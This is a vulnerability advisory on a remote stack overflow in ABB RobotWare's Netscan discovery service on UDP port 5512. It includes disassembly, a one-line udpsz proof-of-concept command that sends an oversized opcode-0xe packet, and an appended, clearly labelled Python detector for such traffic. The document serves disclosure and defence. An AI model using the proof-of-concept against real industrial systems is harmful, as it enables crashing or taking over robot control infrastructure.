#######################################################################

                             Luigi Auriemma

Application:  ABB RobotWare
              the vulnerable service is available in RobotStudio and WebWare:
              http://www.abb.com/product/seitp327/12e18c81002601cac1256f2b003b638e.aspx
              the service doesn't need a license to run, so it can be tested
              without problems; remember to enable the "Data Collector"
              option during the installation of WebWare
Versions:     <= 5.12.2040.02
Platforms:    Windows
Bug:          stack overflow
Exploitation: remote, versus server
Date:         probably found 10 Feb 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

???

#######################################################################

======
2) Bug
======

ABB Industrial Robot Discovery Server (RobNetScanHost.exe) is a service
that is started manually, or automatically when some ABB programs are
launched (for example "Device Configuration"), and then remains up.
This is what happens in WebWare, so it's possible that in the other ABB
products that use it the service is started automatically at boot, or
maybe the situation is the same.

The UDP port 5512 accepts the incoming "Netscan" packets and there is a
stack overflow during the handling of the opcodes 0xa (limited by the
canary) and 0xe (successfully bypasses the canary):

  10002875  |. 48            |DEC EAX                                  ; Switch (cases 1..11)
  10002876  |. 83F8 10       |CMP EAX,10
  10002879  |. 0F87 AE000000 |JA 1000292D
  1000287F  |. FF2485 5E2900>|JMP DWORD PTR DS:[EAX*4+1000295E]
  ...skip...
  100028E3  |> 8B45 84       |MOV EAX,DWORD PTR SS:[EBP-7C]            ; Case A of switch 10002875
  100028E6  |. 57            |PUSH EDI
  100028E7  |. FF75 80       |PUSH DWORD PTR SS:[EBP-80]
  100028EA  |. C700 01000000 |MOV DWORD PTR DS:[EAX],1
  100028F0  |> E8 BBEB0000   |CALL 100114B0                            ; stack overflow
  100028F5  |. 59            |POP ECX
  100028F6  |. EB 34         |JMP SHORT 1000292C
  100028F8  |> 57            |PUSH EDI                                 ; Case C of switch 10002875
  100028F9  |. E8 AAEC0000   |CALL 100115A8
  100028FE  |. 48            |DEC EAX
  100028FF  |. F7D8          |NEG EAX
  10002901  |. 1BC0          |SBB EAX,EAX
  10002903  |. 40            |INC EAX
  10002904  |. 40            |INC EAX
  10002905  |. 8946 40       |MOV DWORD PTR DS:[ESI+40],EAX
  10002908  |. EB 22         |JMP SHORT 1000292C
  1000290A  |> 837D 90 00    |CMP DWORD PTR SS:[EBP-70],0              ; Case E of switch 10002875
  1000290E  |. 74 1D         |JE SHORT 1000292D
  10002910  |. 57            |PUSH EDI
  10002911  |. FF75 90       |PUSH DWORD PTR SS:[EBP-70]
  10002914  |.^ EB DA        |JMP SHORT 100028F0

Both case A and case E fall through to the same CALL 100114B0 at
100028F0 with an attacker-controlled pointer pushed as argument (EBP-80
for opcode 0xa, EBP-70 for opcode 0xe); that callee is where the stack
buffer is overrun.

#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip

  udpsz -c "Netscan;3e8;0;e:" -b a SERVER 5512 1000

#######################################################################

======
4) Fix
======

http://www.zerodayinitiative.com/advisories/ZDI-12-033/

#######################################################################
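The following is an added example for defenders and is not part of Luigi Auriemma's advisory or of ABB's code: a small triage classifier for UDP datagrams destined to the RobNetScanHost port 5512, of the kind one would drop into a packet-capture review script or a sensor plugin to flag requests that match the pattern described in section 2. It assumes (inferred from the udpsz proof-of-concept string "Netscan;3e8;0;e:" and the trailing 1000-byte fill, not from any ABB protocol documentation) that a Netscan request starts with the ASCII marker "Netscan", carries a ';'-separated header terminated by ':', and puts the opcode in the last header field as a hex number; the opcodes 0xa and 0xe, the port and the "Netscan" marker come from the advisory, the size threshold is a constructed value.

```python
"""
Added example, not part of the original advisory.

Assumed Netscan request layout (inferred from the PoC command line, NOT
confirmed by ABB documentation):

    "Netscan" ';' field ';' field ';' <opcode-hex> ':' <body bytes>

Known from the advisory: UDP port 5512, the "Netscan" marker, and that
opcodes 0xa and 0xe reach the overflowing call in RobNetScanHost.exe.
"""
from dataclasses import dataclass
from typing import Optional, Tuple

NETSCAN_PORT = 5512                     # from the advisory
NETSCAN_MARKER = b"Netscan"             # from the advisory / PoC string
OVERFLOW_OPCODES = {0xA, 0xE}           # cases A and E of the switch in section 2
MAX_SANE_BODY = 256                     # constructed threshold; the PoC sends 1000 bytes


@dataclass
class NetscanVerdict:
    opcode: Optional[int]   # parsed opcode, None if the header did not parse
    body_len: int           # bytes after the ':' terminator (or whole datagram)
    suspicious: bool
    reason: str


def parse_opcode(datagram: bytes) -> Tuple[Optional[int], int]:
    """Return (opcode, body length) under the assumed header layout.

    opcode is None when the datagram lacks the marker, the ':' terminator,
    or a hex opcode field; the body length is still reported so a caller
    can log oversized junk that merely starts with the marker.
    """
    if not datagram.startswith(NETSCAN_MARKER):
        return None, len(datagram)
    head, sep, body = datagram.partition(b":")
    if not sep:
        return None, len(datagram)
    fields = head.split(b";")
    try:
        opcode = int(fields[-1], 16)    # int() accepts bytes with an explicit base
    except ValueError:
        return None, len(body)
    return opcode, len(body)


def classify(datagram: bytes, dst_port: int = NETSCAN_PORT) -> NetscanVerdict:
    """Classify one UDP datagram; only port 5512 traffic is inspected."""
    if dst_port != NETSCAN_PORT or not datagram.startswith(NETSCAN_MARKER):
        return NetscanVerdict(None, len(datagram), False, "not a Netscan request")
    opcode, body_len = parse_opcode(datagram)
    if opcode is None:
        # Marker present but header unparsable: worth a look, may be noise.
        return NetscanVerdict(None, body_len, True, "malformed Netscan header")
    if opcode in OVERFLOW_OPCODES and body_len > MAX_SANE_BODY:
        return NetscanVerdict(
            opcode, body_len, True,
            f"opcode 0x{opcode:x} with oversized {body_len}-byte body",
        )
    return NetscanVerdict(opcode, body_len, False, "ok")


if __name__ == "__main__":
    # Constructed sample datagrams, modelled on the PoC string in section 3.
    samples = [
        b"Netscan;3e8;0;e:" + b"a" * 1000,   # shape of the PoC: opcode 0xe, 1000-byte body
        b"Netscan;3e8;0;1:" + b"x" * 8,      # small request with a non-overflow opcode
        b"Netscan;zz:" + b"y" * 16,          # marker present, opcode not hex
        b"hello",                            # unrelated UDP payload
    ]
    for s in samples:
        v = classify(s)
        print(f"{v.suspicious!s:5}  opcode={v.opcode}  body={v.body_len:4}  {v.reason}")
```

The classifier deliberately keys on opcode plus body size rather than on the exact PoC bytes, so a request that swaps the filler or the header fields is still reported; tune MAX_SANE_BODY against a baseline of legitimate discovery traffic before alerting on it.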